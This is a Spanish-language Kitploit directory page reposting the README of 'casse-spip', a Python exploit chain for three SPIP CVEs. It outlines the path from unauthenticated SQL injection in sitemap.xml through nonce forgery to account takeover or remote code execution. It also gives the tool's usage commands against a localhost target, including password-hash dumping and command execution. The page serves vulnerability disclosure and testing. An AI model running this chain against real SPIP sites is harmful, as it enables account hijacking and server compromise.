Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
spip-exploits — Cadena de explotación en Python para los CVE 2026-72708/72709/72710 de SPIP, encadenando inyección SQL no autenticada hasta la toma de control de cuentas y la ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/ambionics/spip-exploits
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónPapers e Investigación
GitHubambionics/spip-exploits

spip-exploits

Cadena de explotación en Python para los CVE 2026-72708/72709/72710 de SPIP, encadenando inyección SQL no autenticada hasta la toma de control de cuentas y la ejecución remota de código.

Ver Repositorio
1hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Casse-Spip (CVE-2026-72708, CVE-2026-72709, CVE-2026-72710)

De una inyección SQL no autenticada a la ejecución remota de código

Exploit para CVE-2026-72708, CVE-2026-72709 y CVE-2026-72710 descubiertos por Franck Chevalier (Wayko)

Para un análisis técnico completo, lea el artículo completo en el blog de Lexfo.

Descargo de responsabilidad

Este repositorio se proporciona únicamente con fines de investigación y seguridad defensiva. El autor no asume ninguna responsabilidad por el uso indebido de esta información.


Descripción general

El punto de entrada es una inyección SQL en la página pública sitemap.xml para filtrar alea_ephemere.

Con ese secreto, se pueden falsificar nonces válidos para acciones anónimas.

A partir de ahí, dos acciones conducen a RCE:

  • action=editer_auteur toma de control de la cuenta, luego RCE desde el área privada.
  • action=editer_objet asignación masiva, para escribir una fila en la cola spip_jobs, luego ejecutarla a través de action=cron.

Explotación

Configuración

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help

Detectar

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000

Cadena completa 1 : Toma de control de la cuenta (CVE-2026-72708 > CVE-2026-72709)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"

Antes de sobrescribir, --ato vuelca el login del objetivo y el hash pass actual (a través de la SQLi) para que pueda restaurarlo después con --restore-hash:

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1

Cadena completa 2 : RCE (CVE-2026-72708 > CVE-2026-72709 > CVE-2026-72710)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"

El archivo se escribirá en IMG/casse-spip_<token>.html.


Referencias

  • Entrada del blog - Análisis técnico completo
  • Vulncheck - Detalles de la vulnerabilidad
  • CVE-2026-72708
  • CVE-2026-72709
  • CVE-2026-72710
Descargar herramienta